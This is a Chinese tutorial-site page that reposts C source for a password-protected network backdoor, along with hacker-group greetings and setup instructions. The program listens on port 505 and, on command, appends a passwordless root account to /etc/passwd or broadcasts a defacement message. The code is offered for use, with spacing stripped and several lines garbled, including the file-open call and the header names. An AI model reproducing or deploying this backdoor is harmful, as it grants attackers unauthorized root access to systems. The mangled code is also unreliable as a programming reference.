手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >backdoor病毒珍藏绝密源代码
backdoor病毒珍藏绝密源代码
摘要:--=backdoor.c=--/*AripoffasocketstutorialifoundsomewherecauseIdidn'tfe...

--=backdoor.c=--/*

AripoffasocketstutorialifoundsomewherecauseIdidn'tfeellike

writingstupidbasicsocketscodewhenIhaditinmysrcdirectory

already.

*/

/*Greets:

UndernetChannels:

#rootworm,#hacktech,#hyperlink,#3xposure,#legionoot

Groups:

TheLegionOOT(www.legionoot.cc),TeamSploit

People:

Cyph3r,n3m0,Adoni,f0bic,d0g,khe0ps,h-S-t,

F-o-X,NeonMatrix,Azmodan,&Venomous

/*

Usage(setup):

#gcc-obackdoorbackdoor.c

#./backdoorpassword&

Usage(using):

telnettohost(port505)-->typethepassword(don'twaitfora

prompt,thereisn'tonesoitslessobviousitsabackdoor)-->

type1or2.Andyesit's_supposed_todisconnectyouafter

eachcommand.

*/

#include

#include

#include

#include

#include

#include

#include

#include

#definePORT505

#defineMAXDATASIZE100

#defineBACKLOG10

voidhandle(char*command);

intmain(intargc,char*argv[])

{

intsockfd,new_fd,sin_size,numbytes;

char*bytes;

structsockaddr_inmy_addr;

structsockaddr_intheir_addr;

charbuf[MAXDATASIZE];

charask[]="EnterCommand(1toputr00t::0:0:...in/etc/passwd,2to

send'7h1sb0x1s0wn3d'toallpeopleonthebox:";

if(argc!=2){

fprintf(stderr,"Usage:%spasswordn",argv[0]);

exit(1);

}

if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1){

perror("socket");

exit(1);

}

my_addr.sin_family=AF_INET;

my_addr.sin_port=htons(PORT);

my_addr.sin_addr.s_addr=INADDR_ANY;

if(bind(sockfd,(structsockaddr*)&my_addr,sizeof(structsockaddr))==-1)

{

perror("bind");

exit(1);

}

if(listen(sockfd,BACKLOG)==-1){

perror("listen");

exit(1);

}

while(1){/*mainaccept()loop*/

sin_size=sizeof(structsockaddr_in);

if((new_fd=accept(sockfd,(structsockaddr*)&their_addr,

&sin_size))==

{

perror("accept");

continue;

}

inet_ntoa(their_addr.sin_addr);

if(!fork()){

recv(new_fd,buf,

MAXDATASIZE,0);

bytes=strstr(buf,argv[1]);

if(bytes!=NULL){

send(new_fd,ask,sizeof(ask),0);

numbytes=recv(new_fd,buf,

MAXDATASIZE,0);

buf[numbytes]='';

handle(buf);

}

close(new_fd);

exit(0);

}

close(new_fd);

while(waitpid(-1,NULL,WNOHANG)>0);/*cleanupchild

processes*/

}

}

voidhandle(char*command)

{

FILE*fle;

if(strstr(command,"1")!=NULL)

{

fle=f0/*n("/etc/passwd","a*/;

fprintf(fle,"r00t::0:0:r00t:/root:/bin/bash");

fclose(fle);

}

if(strstr(command,"2")!=NULL)

{

system("wall7h1sb0x1s0wn3d");

}

}

PBBSER

pbbser@legionoot.hypermart.net

----------------------------

【backdoor病毒珍藏绝密源代码】相关文章:

图片引发的溢出危机(图)

史上MD5解密之最快方法整理(荐)

fckeditor的漏洞详细篇

webshell权限提升技巧

“冲击波”病毒的shellcode源代码

JSP中的源代码泄漏问题

新型网络攻击威胁大量网站

利用BBSxp后台的缺陷得到webshell

对Serv-U 6.0.0.2默认帐户及密码的一点理解

研究UBB的跨站脚本攻击之综合篇

精品推荐
分类导航